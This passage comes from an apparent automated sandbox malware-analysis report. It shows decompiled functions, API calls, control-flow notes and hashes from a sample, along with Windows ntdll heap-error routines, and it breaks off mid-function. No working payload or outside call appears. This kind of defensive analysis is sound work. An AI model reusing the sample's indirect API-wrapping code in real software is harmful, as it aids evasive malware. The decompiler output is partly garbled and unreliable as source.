                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 286 4184d0-418501 call 418dc0 RtlFreeHeap
                                                                                                                C-Code - Quality: 40%
                                                                                                                			E004184D0(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				char _t10;
				void* _t12;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t9 = _a12;
				_t12 = _a8;
				asm("adc al, 0x52");
				_push(_t9);
				_t10 = RtlFreeHeap(_t12); // executed
				return _t10;
			}







                                                                                                                0x004184df
                                                                                                                0x004184e7
                                                                                                                0x004184ef
                                                                                                                0x004184f2
                                                                                                                0x004184f7
                                                                                                                0x004184fb
                                                                                                                0x004184fd
                                                                                                                0x00418501

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 283 418490-4184c1 call 418dc0 RtlAllocateHeap
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                0x004184a7
                                                                                                                0x004184bd
                                                                                                                0x004184c1

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 289 418630-418649 290 41864f-418664 LookupPrivilegeValueW 289->290 291 41864a call 418dc0 289->291 291->290
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                0x0041864a
                                                                                                                0x00418660
                                                                                                                0x00418664

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                0x00418513
                                                                                                                0x0041852a
                                                                                                                0x00418538

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418504, Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00418504(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr* __esi;
				intOrPtr __ebp;
				char _t8;

				asm("rol dword [ecx], 1");
				if(__eflags >= 0) {
					__eflags = __ecx;
					asm("a16 pop ecx");
					_t1 = __edx + 0x52;
					_t2 = __esp;
					__esp =  *_t1;
					 *_t1 = _t2;
					_push(__ebp);
					__ebp = __esp;
					__eax =  *((intOrPtr*)(__ebp + 8));
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					_push(__esi);
					__esi = __eax + 0xc7c;
					__eax = E00418DC0(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa14)), 0, 0x36);
					__edx =  *(__ebp + 0xc);
					__eax =  *__esi;
					ExitProcess( *(__ebp + 0xc));
				}
				asm("adc al, 0x52");
				_push(__eax);
				_t8 = RtlFreeHeap(__ecx); // executed
				return _t8;
			}






                                                                                                                0x00418505
                                                                                                                0x00418507
                                                                                                                0x00418509
                                                                                                                0x0041850b
                                                                                                                0x0041850d
                                                                                                                0x0041850d
                                                                                                                0x0041850d
                                                                                                                0x0041850d
                                                                                                                0x00418510
                                                                                                                0x00418511
                                                                                                                0x00418513
                                                                                                                0x00418516
                                                                                                                0x0041851c
                                                                                                                0x00418522
                                                                                                                0x0041852a
                                                                                                                0x0041852f
                                                                                                                0x00418532
                                                                                                                0x00418538
                                                                                                                0x00418538
                                                                                                                0x004184f7
                                                                                                                0x004184fb
                                                                                                                0x004184fd
                                                                                                                0x00418501

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
                                                                                                                • Instruction ID: 6f1cddfd4babd5e96773481bc3a69ad9b38a3c8300a48473b802043c359ea8b8
                                                                                                                • Opcode Fuzzy Hash: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
                                                                                                                • Instruction Fuzzy Hash: 2AC012721012119FC22AEBA4A8818F2B738EF853213250A9FE0898B801CA25A4429AD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 53662d24fe664d3bec27704840f744e0213dfc77c9050733dbe3b2bd756b4cb7
                                                                                                                • Instruction ID: 2892d63dd41b5f58d73e56a562f917afef8fa8b4147951bd02fc0c65b4133e61
                                                                                                                • Opcode Fuzzy Hash: 53662d24fe664d3bec27704840f744e0213dfc77c9050733dbe3b2bd756b4cb7
                                                                                                                • Instruction Fuzzy Hash: 51B09B719425C5C5D711E77146087277A4477D0745F66C062D1420655A4778C891F6B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 00A4B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00A4B305
                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 00A4B352
                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A4B3D6
                                                                                                                • *** Inpage error in %ws:%s, xrefs: 00A4B418
                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00A4B484
                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00A4B2F3
                                                                                                                • This failed because of error %Ix., xrefs: 00A4B446
                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00A4B53F
                                                                                                                • The resource is owned shared by %d threads, xrefs: 00A4B37E
                                                                                                                • The critical section is owned by thread %p., xrefs: 00A4B3B9
                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A4B38F
                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00A4B47D
                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00A4B39B
                                                                                                                • write to, xrefs: 00A4B4A6
                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00A4B476
                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00A4B323
                                                                                                                • a NULL pointer, xrefs: 00A4B4E0
                                                                                                                • <unknown>, xrefs: 00A4B27E, 00A4B2D1, 00A4B350, 00A4B399, 00A4B417, 00A4B48E
                                                                                                                • *** then kb to get the faulting stack, xrefs: 00A4B51C
                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00A4B314
                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 00A4B3C5
                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 00A4B48F
                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 00A4B374
                                                                                                                • read from, xrefs: 00A4B4AD, 00A4B4B2
                                                                                                                • *** enter .exr %p for the exception record, xrefs: 00A4B4F1
                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 00A4B432
                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00A4B2DC
                                                                                                                • The instruction at %p tried to %s , xrefs: 00A4B4B6
                                                                                                                • *** enter .cxr %p for the context, xrefs: 00A4B50D
                                                                                                                • an invalid address, %p, xrefs: 00A4B4CF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                • API String ID: 0-108210295
                                                                                                                • Opcode ID: d62bfc403ec1c752cf555c21c6e877c715e77f1e44bb40c2900a367e042ba5b3
                                                                                                                • Instruction ID: 2a34fe5dc2640ed81a498b1673d081bb4193028609760991365c9f17e2726045
                                                                                                                • Opcode Fuzzy Hash: d62bfc403ec1c752cf555c21c6e877c715e77f1e44bb40c2900a367e042ba5b3
                                                                                                                • Instruction Fuzzy Hash: 8B81FE79A51220BFCB21AF199C4AE7B3B36AFC6B65F004054F1046B693D371D801EBB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A51C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00A51C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x9748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0099B150();
				} else {
					E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xa8589c);
				E0099B150("Heap error detected at %p (heap handle %p)\n",  *0xa858a0);
				_t27 =  *0xa85898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00A51E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0099B150();
				} else {
					E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0099B150("Error code: %d - %s\n",  *0xa85898);
				_t113 =  *0xa858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0099B150("Parameter1: %p\n",  *0xa858a4);
				}
				_t115 =  *0xa858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0099B150("Parameter2: %p\n",  *0xa858a8);
				}
				_t117 =  *0xa858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0099B150("Parameter3: %p\n",  *0xa858ac);
				}
				_t119 =  *0xa858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0099B150();
					} else {
						E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xa858b4);
					E0099B150("Last known valid blocks: before - %p, after - %p\n",  *0xa858b0);
				} else {
					_t120 =  *0xa858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0099B150();
				} else {
					E0099B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0099B150("Stack trace available at %p\n", 0xa858c0);
			}











                                                                                                                0x00a51c10
                                                                                                                0x00a51c16
                                                                                                                0x00a51c1e
                                                                                                                0x00a51c3d
                                                                                                                0x00a51c3e
                                                                                                                0x00a51c20
                                                                                                                0x00a51c35
                                                                                                                0x00a51c3a
                                                                                                                0x00a51c44
                                                                                                                0x00a51c55
                                                                                                                0x00a51c5a
                                                                                                                0x00a51c65
                                                                                                                0x00a51c67
                                                                                                                0x00000000
                                                                                                                0x00a51c6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a51c67
                                                                                                                0x00a51cdc
                                                                                                                0x00a51ce5
                                                                                                                0x00a51d04
                                                                                                                0x00a51d05
                                                                                                                0x00a51ce7
                                                                                                                0x00a51cfc
                                                                                                                0x00a51d01
                                                                                                                0x00a51d0b
                                                                                                                0x00a51d17
                                                                                                                0x00a51d1f
                                                                                                                0x00a51d25
                                                                                                                0x00a51d30
                                                                                                                0x00a51d4f
                                                                                                                0x00a51d50
                                                                                                                0x00a51d32
                                                                                                                0x00a51d47
                                                                                                                0x00a51d4c
                                                                                                                0x00a51d61
                                                                                                                0x00a51d67
                                                                                                                0x00a51d68
                                                                                                                0x00a51d6e
                                                                                                                0x00a51d79
                                                                                                                0x00a51d98
                                                                                                                0x00a51d99
                                                                                                                0x00a51d7b
                                                                                                                0x00a51d90
                                                                                                                0x00a51d95
                                                                                                                0x00a51daa
                                                                                                                0x00a51db0
                                                                                                                0x00a51db1
                                                                                                                0x00a51db7
                                                                                                                0x00a51dc2
                                                                                                                0x00a51de1
                                                                                                                0x00a51de2
                                                                                                                0x00a51dc4
                                                                                                                0x00a51dd9
                                                                                                                0x00a51dde
                                                                                                                0x00a51df3
                                                                                                                0x00a51df9
                                                                                                                0x00a51dfa
                                                                                                                0x00a51e00
                                                                                                                0x00a51e0a
                                                                                                                0x00a51e13
                                                                                                                0x00a51e32
                                                                                                                0x00a51e33
                                                                                                                0x00a51e15
                                                                                                                0x00a51e2a
                                                                                                                0x00a51e2f
                                                                                                                0x00a51e39
                                                                                                                0x00a51e4a
                                                                                                                0x00a51e02
                                                                                                                0x00a51e02
                                                                                                                0x00a51e08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a51e08
                                                                                                                0x00a51e5b
                                                                                                                0x00a51e7a
                                                                                                                0x00a51e7b
                                                                                                                0x00a51e5d
                                                                                                                0x00a51e72
                                                                                                                0x00a51e77
                                                                                                                0x00a51e95

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                • API String ID: 0-2897834094
                                                                                                                • Opcode ID: d2b8c267c39f0d7938f77a83e002fdc1dd03dc7be90b3cbe77077ebfb8c09842
                                                                                                                • Instruction ID: 964385c9dfd4b7d7ffdd887fac355172657f6f86f8e26a95f589138cc44b7f71
                                                                                                                • Opcode Fuzzy Hash: d2b8c267c39f0d7938f77a83e002fdc1dd03dc7be90b3cbe77077ebfb8c09842
                                                                                                                • Instruction Fuzzy Hash: BE61E533954644DFC721AB98E9A6F3073F4FB40B22B19843AFC0D6B361D6789C459B0A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009A3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E009A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E009A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E009A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E009A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E009A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E009A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L009B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E009DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E009E1370(_t276, 0x974e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E009DBB40(0,  &_v68, _t170);
									if(L009A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E009DBB40(_t257,  &_v68, _t243);
								if(L009A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E009E1370(_t278, 0x974e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
